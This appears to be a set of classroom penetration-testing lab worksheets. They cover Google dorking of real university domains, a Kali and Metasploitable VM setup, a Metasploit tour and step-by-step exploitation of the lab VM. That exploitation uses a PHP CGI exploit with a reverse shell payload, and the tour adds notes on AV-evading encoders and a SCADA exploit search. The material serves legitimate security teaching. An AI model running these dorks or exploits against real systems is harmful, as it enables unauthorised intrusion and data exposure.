Computer Science

Google Hacking Lab

Class

Name:

Date:

This is an introduction to using search engines for penetration testing. “Google Hacking” is a valuable skill for penetration testers. Google’s automated crawlers constantly visit every IP in the world, collect information about the services each IP provides, and index the content it makes available. Google hacking could be called an art. The information gathered is limited only by your ingenuity when crafting your queries. Keep in mind, the principles behind Google hacking apply to all search engines.

In this lab you will enumerate sub-domains, identify new machines, scour web servers for files that reside on directories but have been forgotten, learn about the underlying architecture of web servers, locate logon portals, and use targeted queries to locate specific file types. When clicking on links, use the cached version so you visit Google’s cache and not the website itself.

1. Open a browser and navigate to: google.com

2. We’re going to search exclusively for Wilmu domains.

2a. Type: site:wilmu.edu

3. We received too many www.wilmu.edu returns for this search to be of use. Let’s subtract some information from our query.

3a. Type: site:wilmu.edu -site:www.wilmu.edu -site:libguides.wilmu.edu

3b. What new domains did you identify?

Answer:

4. Now let’s see what systems provide directory listings. Directory listings are important because there is the potential you will be able to see the entire website’s file structure. Also, many webmasters forget to remove content they no longer make visible with hyperlinks. This content is valuable for various information gathering and exploitation reasons because it could be old pictures, databases, password files, etc. (Be sure to click on the cached links and not the actual links.)

4a. Type: site:umass.edu intitle:index.of

5. Another search we might do is for error or warning messages that give us an indication of the underlying infrastructure and application. Depending on the error or warning we will be able to determine if the web server is running Apache, IIS, SharePoint, WordPress, etc. To do this we would use the “or” operator. A query with the or operator for warnings or errors would look something like this: intitle:”apache status” “apache server status for” | “welcome to windows small business server 2003”

6. Let’s look for applications and databases we may login to. Many organizations use Federated rights, meaning once you’re logged in you may login to other systems. This is called “single sign-on” or SSO.

6a. Type: site:wilmu.edu logon | login

6b. What Portals did you find?

Answer:

7. We found some interesting portals but those are for students. Where else might a penetration tester look?

7a. Type: site:wilmu.edu faculty | staff | admin | administrator + login | logon

7b. What results did you find?

Answer:

8. We’ve been looking for interesting information about sub-domains, content posted on websites, and logon portals, but what about the files themselves? Are some file extensions more promising than others? Let’s find out by searching for different file extensions.

8a. Type: site:wilmu.edu ext:pdf

8b. Type: site:wilmu.edu ext:asp username

What link did you find that may be of use?

Answer:

8c. Type: ext:mdb (mdb is a Microsoft Access database extension.)

Did you find any interesting results?

Answer:
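The directory-listing and file-extension steps above work because autoindex pages carry a predictable title and forgotten files keep their extensions. The following Python script is an added example, not part of the lab: it runs the same two checks over responses you have already fetched from your own site, so the exposure is found before a search engine indexes it. The Page records, the example.edu URLs and the SENSITIVE_EXTENSIONS set are constructed for illustration.

```python
import os
import re
from typing import Iterable, NamedTuple
from urllib.parse import urlparse

# Extensions the lab singles out with ext: queries (mdb is the Access database
# case) plus common forgotten-backup leftovers; extend for your own site.
SENSITIVE_EXTENSIONS = {".mdb", ".sql", ".bak", ".old", ".zip"}

# Apache/nginx autoindex pages carry a predictable title, which is exactly why
# the "intitle:index.of" query locates them once the page has been crawled.
INDEX_TITLE = re.compile(r"<title>\s*Index of\s+/", re.IGNORECASE)


class Page(NamedTuple):
    url: str
    status: int
    body: str


class Finding(NamedTuple):
    url: str
    issue: str


def classify(page: Page) -> list[str]:
    """Return the exposure types found in one fetched page (empty list if none)."""
    issues: list[str] = []
    if page.status != 200:          # a 403/404 is not indexable content
        return issues
    if INDEX_TITLE.search(page.body):
        issues.append("directory-listing")
    ext = os.path.splitext(urlparse(page.url).path)[1].lower()
    if ext in SENSITIVE_EXTENSIONS:
        issues.append(f"sensitive-extension:{ext}")
    return issues


def audit(pages: Iterable[Page]) -> list[Finding]:
    """Run classify() over every page and flatten the results."""
    return [Finding(p.url, issue) for p in pages for issue in classify(p)]


# Constructed sample responses (example.edu is a placeholder, not a real site).
SAMPLE_PAGES = [
    Page("https://www.example.edu/old/", 200,
         "<html><head><title>Index of /old</title></head><body>...</body></html>"),
    Page("https://www.example.edu/old/students.mdb", 200, "\x00\x01binary"),
    Page("https://www.example.edu/about.html", 200,
         "<html><head><title>About</title></head></html>"),
    Page("https://www.example.edu/backup/", 403, "Forbidden"),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_PAGES):
        print(f"{finding.issue:28} {finding.url}")
```

Feed it the URL, status and body of each page from your own crawl; anything it flags is what the site: and intitle:index.of queries would surface once indexed.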

VMWare Home Lab Setup Instructions

1. Download all VMs.

1a. Download Kali VM: http://www.kali.org/downloads/

1b. Download Metasploitable 2 VM: https://information.rapid7.com/metasploitable-download.html

1c. Download VMware Player: https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/6_0

1d. Be sure to unzip all files.

2. Install VMWare Player.

3. Open VMware Player.

4. Click the “Open a Virtual Machine” option.

5. Navigate to the Metasploitable VM and select this file: Metasploitable.vmx

5a. If you get a prompt asking if you moved or copied the VM select: “I copied it.”

5b. If you get a prompt asking if you want to download VMware Tools for Linux click “Download and Install”.

6. Open a second instance of VMware Player.

7. Navigate to the Kali VM and select the .vmx file.

7a. If you get a prompt asking if you moved or copied the VM select: “I copied it.”

Both your Kali VM and your Metasploitable VM should be running. Switch your focus to the Kali VM.

8. Type this username at the login prompt: root

9. Type this password: toor

We need to change the default password because it’s not secure. While the password we’re changing it to isn’t necessarily secure (for the sake of simplicity in this class) we still need to change it on principle.

10. Type: passwd

11. Type: wilmu123

12. Let’s update Kali so we have the latest updates.

12a. Type: apt-get update && apt-get upgrade

12b. Open the MSFConsole and type:

apt-get update

apt-get upgrade

apt-get dist-upgrade

Now let’s switch our focus to the Metasploitable VM.

13. At the user logon prompt type: msfadmin

This is an intentionally vulnerable system so there’s no point in changing the password from the default.

14. At the password prompt type: msfadmin

You are now ready to pen test!

Introduction to Metasploit – A Tour

Class:

Name:

Date:

What is Metasploit?

Metasploit is an open source framework for exploitation that has transcended its humble beginnings and become a “penetration testing environment suite” – my interpretation. I say this because you are now able to use Metasploit to accomplish any task in the penetration testing phase and, based on your findings, you may choose a tool/methodology, modify an existing tool/methodology, or create a new tool/methodology to accomplish your goal. While most penetration testing options like Canvas have additional options and features, none provide you with the freedom and flexibility that Metasploit does. So while Kali is a wonderful Linux-based operating system loaded with tools, a pentester has everything he or she needs in Metasploit. As you will soon learn in this course, Metasploit has reconnaissance tools (discovery and vulnerability scanners), malicious code generators, evasion apps so your exploit doesn’t get caught by IPS or antivirus, password attack tools, and many, many more.

1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Launch a shell. (It’s the black box icon to the right of Applications, Places.)

3. Type: msfconsole

3a. Wait patiently for Metasploit to load.

3b. Open another shell and type: env (View the PATH variable. When you attempt to execute a program Linux looks at all of the paths in the PATH environment variable to find and execute the program. That’s why you may type “msfconsole” and the program executes.)

4. If you visit the Rapid7 website you will find you have the option to register for notifications, support, and updates of Kali. Rapid7 has moved away from using SVN for code management to Git. For our purposes here it doesn’t matter but if you enjoy working on the bleeding edge of distros you may want to register and upgrade to the latest version.

5. Switch your focus back to the Metasploit shell. Look at the information under the banner and answer the questions below about the various modules available.

5a. How many exploits does Metasploit have:

5b. How many auxiliary exploits does Metasploit have:

5c. How many post modules does Metasploit have:

5d. How many payloads does Metasploit have:

5e. How many encoders does Metasploit have:

5f. How many nops does Metasploit have:

Metasploit Modules Breakdown

I’ve defined Metasploit’s modules below. Take the time to read them so you have a better understanding of their purpose and use.

Exploits – Pre-packaged malicious executables that take advantage of a vulnerability to gain access to a system and deliver a payload.

Payloads – Can be a variety of applications/configurations used to establish a foothold on a system post-exploitation. Examples are reverse shells that call home or stagers for further exploitation and persistence. Meterpreter is a particularly useful and commonly used payload shell.

Encoders – Obfuscates exploits and payloads so they can’t be fingerprinted by AV or IDS/IPS definitions.

Auxiliary – Attack components such as DoS tools, buffer overflows, SQL injection apps, fuzzers, and more.

Post – Automation modules for post-exploitation. Tools to further establish access on a system or network like keystroke loggers and privilege escalators.

NOPs – NOP sled tools such as buffer overflow reference material for custom NOP sleds. For simplicity’s sake we’ll say NOP sleds tell a processor to do nothing for a specified number of clock cycles, thereby increasing the chances of your code executing successfully.

With that brief introduction behind us let’s learn by doing.

*You may want to maximize your shell to full screen.

6. Type: help (Notice the list of commands available to you in Metasploit.)

7. Type: show exploits (Wait patiently for the Metasploit database to be queried and print the results to your terminal.)

7a. Notice the format: Name, Date, Rank, Description

7b. What is the date of the “windows/http/sonicwall_scrutinizer_sqli” exploit?

7c. What is its rank?

7d. What is its description?

8. Encoders allow you to encode your payload so it doesn’t trigger antivirus or IDS tools like McAfee’s HBSS. This is very important to know and understand because most AV and IDS tools aren’t going to catch your payload if you encode it.

8a. Type: show encoders

8b. Find and document an encoder here:

9. Payloads are the deliveries we will make to the system we are exploiting.

9a. Type: show payloads

9b. Find and document a payload for the Mac OS here:

10. We will use auxiliary modules quite a bit. There are a variety of community provided penetration testing tools located here.

10a. Type: show auxiliary

10b. Does the auxiliary module contain scanners?

Now let’s get down to business and pretend we are professional penetration testers researching a strategy to gain access to an industrial control system network such as a water treatment plant.

11. We need to find a Windows SCADA exploit.

11a. Type every word after this colon: search windows/scada

12. Let’s learn more about a particular module we found in our search results to confirm it will be useful to us.

12a. Type: info windows/scada/moxa_mdmtool

12b. Who provided this exploit?

12c. What are the options available for this exploit?

12d. What references are available?

12e. What does the description tell us this module does?

13. This may be the exploit we need to compromise the system.

13a. Type: use windows/scada/moxa_mdmtool

13b. Type: show payloads

13c. Document two payloads you might use that are available for this exploit:

14. Type: show advanced

14a. These advanced options, for the most part, won’t normally be changed by you. You will want to change them in some cases though. Scroll down to the SSL option. It’s currently set to false. If you were running a reverse shell out of a network you may want to enable SSL not only to potentially hide your activity but also to protect your client. The last thing you want to do is expose the client’s data to a third party because you transferred it in clear text over the internet.

15. Type: show options

15a. These are the settings the exploit currently has.

16. Type: info

17. Type: help

17a. What command would you type to verify a system is vulnerable to this exploit?

17b. What command would you use to execute the exploit?

18. Type: exit

Now let’s take a look at how Metasploit’s file system is organized.

19. Type: cd /usr/share/metasploit-framework/modules

19a. Type: ls (You should recognize the high level organization.)

19b. Type: cd exploits

19c. Type: ls (As you can see, you may drill down in each folder to view the available tools Metasploit offers. Although this isn’t necessary, it is good to understand how Metasploit is organized for troubleshooting modules.)

You’ve gained a basic understanding of Metasploit’s organization and how to explore this popular open source penetration testing tool suite. We’ll gain a higher level of understanding and take part in a more advanced use of Metasploit in subsequent labs.

Metasploit Msfconsole Lab

Class:

Name:

Date:

1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word “Places”.

3. Type: service postgresql start

4. Launch Metasploit by typing: msfconsole

5. Type: db_status

6. Open another instance of VMware and launch the Metasploitable VM.

7. At the user logon prompt type: msfadmin

8. At the password prompt type: msfadmin

9. Type: ifconfig

10. Record the IP address here:

In this lab we’ll be demonstrating the use of the msfconsole. We’ll exploit a vulnerability of the Apache web server, deliver a payload, and confirm we have a reverse shell.

1. Switch back to Kali.

2. Type this and hit the enter key at the msf> prompt: db_nmap -p 1-1024 -sV x.x.x.x (IP address of the Metasploitable system that you recorded in Step 12.) We’ve just done a port scan on our target using Nmap. We’ve added our results to the Nmap database in case we need to retrieve the results for later review. We only scanned ports 1-1024 and we used the -sV switch on open ports to determine the application and version that is running.

5. What service is running on these ports:

(The command will take a couple of minutes to run.)

Port 21:

Port 22:

Port 23:

Port 25:

Port 53:

Port 80:

Port 111:

Port 139:

Port 445:

Port 512:

Port 513:

Port 514:

All of these ports and the services/applications running on them have the potential to be exploited but we have to determine the version of the software running on them.

6. Take notice of the TCP port 80. Apache httpd 2.2.8 (Ubuntu) is running. Let’s see if we can find out more information about the software running on port 80.

7. Type: use scanner/http/http_version

8. Type: info (Make note of the RHOSTS option. We’ll use that to specify the IP of our target.)

9. Type: set RHOSTS x.x.x.x (This is our target’s IP.)

10. Type: set RPORT 80

11. Type: exploit

12. Take notice of the results: Powered by PHP/5.2.4ubuntu5.10

13. We just learned a little bit more about our Apache server running an Ubuntu OS. It’s running PHP 5.2.4.

14. Let’s find out what exploits exist for PHP. Maximize your VMware window and type: clear

15. Type and wait: search php type:exploit

16. Type: use exploit/multi/http/php_cgi_arg_injection

17. Type: info

a. What version of PHP does the description say is vulnerable to this exploit?

ANSWER:

18. Now that we believe we may have a working exploit let’s view and choose the desired payload that is compatible with this exploit. Type: show payloads

19. We’ll go with a stable and reliable reverse shell. Type: set PAYLOAD generic/shell_reverse_tcp

20. Type: set RHOST x.x.x.x (IP of target.)

21. Type: set LHOST x.x.x.x (Your IP.)

22. Type: set LPORT 1234

23. Type: show options (This will verify your changes. Make sure the options you have set are showing.)

24. Type: show advanced (Verify there is nothing else you want to change.)

25. Type: exploit

26. You may be asking yourself what, if anything, happened. Type: ls

a. How many files and folders were displayed.

ANSWER:

27. Type: pwd

a. Document your present working directory.

ANSWER:

28. Type: whoami

a. Document the name of the account you are logged on with.

ANSWER:

29. Type: uname -a

30. Type: cat /etc/issue

Excellent! You’ve used the MSFconsole to run a port scan and save the contents of that scan to a database for later retrieval. You further investigated a port of interest by running an additional scanner against it and determined more information about the application and version information. You then searched Metasploit’s database for applicable exploits. Once you found an appropriate exploit you determined the payload you will use, ran it, got a reverse shell, and verified connectivity by executing some simple commands. Congratulations! Following these simple steps when trying to penetration test systems will aid you in better understanding the nuances of exploiting systems.

29. Press ctrl+c. Type “y” when prompted.

30. Type: back

31. Type: exit

Metasploit Database Lab

Class:

Name:

Date:

1. If your VMs aren’t already running, open VMware and launch the Kali VM and login as root with your password wilmuabc. *If Metasploit is loaded from a previous lab it must be closed.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word “Places”.

3. Type: service postgresql start

3a. Type: service metasploit start

3b. Type: service metasploit stop

4. Launch Metasploit. Type: msfconsole

Once Metasploit launches we have to connect to the Postgres database.

5. Type: db_status (You should see a connection to the database.)

6a. Are we connected to a database?

ANSWER:

6. If Metasploitable isn’t already running open another instance of VMware and launch the Metasploitable VM.

7. At the user logon prompt type: msfadmin

8. At the password prompt type: msfadmin

9. Type: ifconfig

10. Record the IP address here:

Metasploit has a default relational database you can populate with data. The database is very useful for capturing and organizing penetration testing data that you may want to refer to again, use for automating penetration tests, share with others, create reports, etc. The database contains these tables: hosts, services, vulns, clients, loot (passwords, hashes, etc), and notes.

Useful database commands are:

db_connect (Connects you to an existing database.)

db_disconnect (Disconnects you from a database.)

db_driver (Allows you to specify the type of database you will be connecting to: MySQL, SQLite, PostgreSQL, etc.)

db_status (Tells you the type of database you’re connected to.)

db_export (Allows you to export the contents of the database to XML.)
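To make concrete what db_nmap stores in the hosts and services tables (both here and in the port scan step of the msfconsole lab), here is an added Python example, not Metasploit’s own code: it parses Nmap’s XML output (nmap -oX) into a two-table SQLite schema of the same shape and queries it the way the services command does. The schema, the helper names and the SAMPLE_XML scan (192.0.2.10 is a documentation address; only the port 80 banner is taken from the lab) are constructed for illustration.

```python
import sqlite3
import xml.etree.ElementTree as ET

# Minimal stand-ins for Metasploit's hosts and services tables.
SCHEMA = """
CREATE TABLE hosts (id INTEGER PRIMARY KEY, address TEXT UNIQUE);
CREATE TABLE services (id INTEGER PRIMARY KEY, host_id INTEGER REFERENCES hosts(id),
                       port INTEGER, proto TEXT, state TEXT, name TEXT, info TEXT);
"""

def open_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con

def import_nmap_xml(con: sqlite3.Connection, xml_text: str) -> int:
    """Load hosts and ports from Nmap -oX output; returns the service rows added."""
    root = ET.fromstring(xml_text)
    added = 0
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        con.execute("INSERT OR IGNORE INTO hosts(address) VALUES (?)", (ip,))
        host_id = con.execute("SELECT id FROM hosts WHERE address = ?",
                              (ip,)).fetchone()[0]
        for port in host.findall("ports/port"):
            state = port.find("state").get("state")
            svc = port.find("service")  # absent on closed ports
            name = svc.get("name") if svc is not None else None
            # -sV fills product/version/extrainfo; join whatever is present.
            info = "" if svc is None else " ".join(
                v for v in (svc.get("product"), svc.get("version"),
                            svc.get("extrainfo")) if v)
            con.execute("INSERT INTO services(host_id, port, proto, state, name, info) "
                        "VALUES (?, ?, ?, ?, ?, ?)",
                        (host_id, int(port.get("portid")), port.get("protocol"),
                         state, name, info))
            added += 1
    con.commit()
    return added

def services_for(con: sqlite3.Connection, ip: str, state: str = "open") -> list:
    """Equivalent of the msfconsole `services` command filtered to one host."""
    return con.execute(
        "SELECT s.port, s.proto, s.name, s.info FROM services s "
        "JOIN hosts h ON h.id = s.host_id WHERE h.address = ? AND s.state = ? "
        "ORDER BY s.port", (ip, state)).fetchall()

# Constructed Nmap XML for one lab host (192.0.2.10 is a documentation address;
# the port 80 banner matches the lab, the ssh version is made up).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap"><host><status state="up"/>
 <address addr="192.0.2.10" addrtype="ipv4"/>
 <ports>
  <port protocol="tcp" portid="22"><state state="open"/>
   <service name="ssh" product="OpenSSH" version="5.3"/></port>
  <port protocol="tcp" portid="80"><state state="open"/>
   <service name="http" product="Apache httpd" version="2.2.8" extrainfo="(Ubuntu)"/></port>
  <port protocol="tcp" portid="8080"><state state="closed"/></port>
 </ports></host></nmaprun>"""
```

Run it with `db = open_db(); import_nmap_xml(db, SAMPLE_XML); services_for(db, "192.0.2.10")`; re-importing the same scan keeps one hosts row but appends service rows, which is why Metasploit’s own importer deduplicates on host, port and protocol.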

1. We know we are connected to the database so now let’s populate it with target information. Switch back to your Kali VM and return to the Metasploit prompt msf>.

2. Type: db_nmap x.x.x.x (IP of your target.)

3. You’ve just added the contents of your nmap scan to the database. Let’s view the individual tables.

4. Type: hosts

a. What hosts are listed in the table?

ANSWER:

5. Type: services

a. What information is provided in this table?

ANSWER:

6. We would normally also type “notes” or “loot” or “vulns” but we haven’t populated the database with any of that information. FYI, the vulns information may be imported from .nessus files. If you’re not familiar with Nessus, Google it for a quick reference. These tables will populate as you exploit systems.

Interacting with a database when performing reconnaissance or running a vulnerability scan may not seem immensely helpful in a lab setting because we’re only scanning 1 system, but what if we were scanning 10 systems or 100 systems or 1000 systems or 10000 systems or even more? It is simply not feasible for a pen tester to scroll through the results and manually document interesting findings. That’s where the beauty of logging our penetration testing results to databases really pays off. Being able to instantly reference all of the hosts we’ve scanned for a project or review all of the possible vulnerabilities in systems we’ll be exploiting is a professional approach to handling the mountains of data that may be generated during a customer engagement.
